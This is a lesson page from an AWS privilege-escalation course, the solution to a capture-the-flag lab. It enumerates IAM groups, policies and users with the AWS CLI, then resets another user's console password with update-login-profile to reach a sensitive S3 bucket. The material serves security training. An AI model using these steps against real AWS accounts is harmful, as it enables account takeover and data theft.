Back to Course

IAM Privilege Escalation Labs

0% Complete
0/0 Steps
  1. Introduction

    About this course
  2. Real-world case studies
  3. Useful IAM tips and security tools
  4. Introduction to AWS Enumeration
    [LAB] Getting Started with the AWS CLI
  5. [LAB] Introduction to AWS IAM Enumeration
  6. [Cheat Sheet] IAM Enumeration CLI Commands
  7. [LAB] Introduction to Secrets Manager Enumeration
  8. [Cheat Sheet] Secrets Manager Enumeration CLI Commands
  9. [LAB] Introduction to Amazon S3 Enumeration
  10. iam:CreateAccessKey
    [LAB] [CTF] iam:CreateAccessKey PrivEsc
  11. iam:CreateAccessKey Solution
  12. iam:CreateLoginProfile
    [LAB] [CTF] iam:CreateLoginProfile PrivEsc
  13. iam:CreateLoginProfile Solution
  14. iam:UpdateLoginProfile
    [LAB] [CTF] iam:UpdateLoginProfile PrivEsc
  15. iam:UpdateLoginProfile Solution
  16. iam:SetDefaultPolicyVersion
    [LAB] [CTF] iam:SetDefaultPolicyVersion PrivEsc
  17. iam:SetDefaultPolicyVersion Solution
  18. iam:AddUserToGroup
    [LAB] [CTF] iam:AddUserToGroup PrivEsc
  19. iam:AddUserToGroup Solution
  20. iam:AttachUserPolicy
    [LAB] [CTF] iam:AttachUserPolicy PrivEsc
  21. iam:AttachUserPolicy Solution
  22. iam:AttachGroupPolicy
    [LAB] [CTF] iam:AttachGroupPolicy PrivEsc
  23. iam:AttachGroupPolicy Solution
  24. iam:PutUserPolicy
    [LAB] [CTF] iam:PutUserPolicy PrivEsc
  25. iam:PutUserPolicy Solution
  26. iam:PutGroupPolicy
    [LAB] [CTF] iam:PutGroupPolicy PrivEsc
  27. iam:PutGroupPolicy Solution
  28. iam:AttachRolePolicy
    [LAB] [CTF] iam:AttachRolePolicy PrivEsc
  29. iam:AttachRolePolicy Solution
  30. iam:PutRolePolicy
    [LAB] [CTF] iam:PutRolePolicy PrivEsc
  31. iam:PutRolePolicy Solution
  32. Challenges
    About challenges
  33. Challenge #1 - Secrets Unleashed
  34. Challenge #2 - IAM Escape Room
  35. Conclusion
    What's next?
Lesson 15 of 35
In Progress

iam:UpdateLoginProfile Solution

Christophe November 19, 2023

Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile.

aws configure --profile updatelogin

Enumerate your user’s permissions:

aws iam list-groups --profile updatelogin
Code language: PHP (php)
{
    "Groups": [
        {
            "Path": "/",
            "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
            "GroupId": "AGPA5M7PA4Z555SJEHAYD",
            "Arn": "arn:aws:iam::921234892411:group/iam-updateloginprofile-privesc-1701726668596-Developers",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

Code language: JSON / JSON with Comments (json)

List policies for this group:

aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1701726668596-Developers --profile updatelogin

Code language: PHP (php)
{
    "PolicyNames": [
        "iam-updateloginprofile-privesc-1701726668596-policy"
    ]
}
Code language: JSON / JSON with Comments (json)

Now list the permissions in this policy:

aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1701726668596-Developers --policy-name iam-updateloginprofile-privesc-1701726668596-policy --profile updatelogin

Code language: JavaScript (javascript)
{
    "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
    "PolicyName": "iam-updateloginprofile-privesc-1701726668596-policy",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:ListGroupPolicies",
                    "iam:ListPolicies",
                    "iam:ListPolicyVersions",
                    "iam:ListUserPolicies",
                    "iam:ListUsers",
                    "iam:ListGroups",
                    "iam:ListGroupsForUser",
                    "iam:GetPolicy",
                    "iam:GetPolicyVersion",
                    "iam:GetRole",
                    "iam:GetRolePolicy",
                    "iam:GetUser",
                    "iam:GetUserPolicy",
                    "iam:GetGroupPolicy"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:GetObject"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411/*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListAllMyBuckets",
                    "s3:GetBucketLocation"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }
        ]
    }
}

Code language: JSON / JSON with Comments (json)

By viewing your policy, you get quite a bit of information back. Including that you are able to list users in this account:

aws iam list-users --profile updatelogin

Code language: PHP (php)
{
    "Users": [
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Alice",
            "UserId": "AIDA5M7PA4Z5VBTREZO3L",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Attacker",
            "UserId": "AIDA5M7PA4Z5TE63N6QMD",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
            "CreateDate": "2023-12-04T21:51:14+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Bob",
            "UserId": "AIDA5M7PA4Z5SGDBSVMK6",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Mark",
            "UserId": "AIDA5M7PA4Z57CYAWOOIP",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

Code language: JSON / JSON with Comments (json)

This result shows us that there are multiple IAM users:

  • Alice
  • Bob
  • Mark

Which one should we attack?

Well, if we look at the IAM policy attached to our group, we have:

{
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },

Code language: JavaScript (javascript)

But then we have an explicit deny:

{
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }

Code language: JSON / JSON with Comments (json)

That means we cannot UpdateLoginProfile on Mark or Alice, it has to be Bob.

aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1701727836920-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile updatelogin

Code language: JavaScript (javascript)

We can now use the username, AWS account ID, and the password we provided, in order to log into the AWS console:

https://signin.aws.amazon.com/signin

From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download.

Responses

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.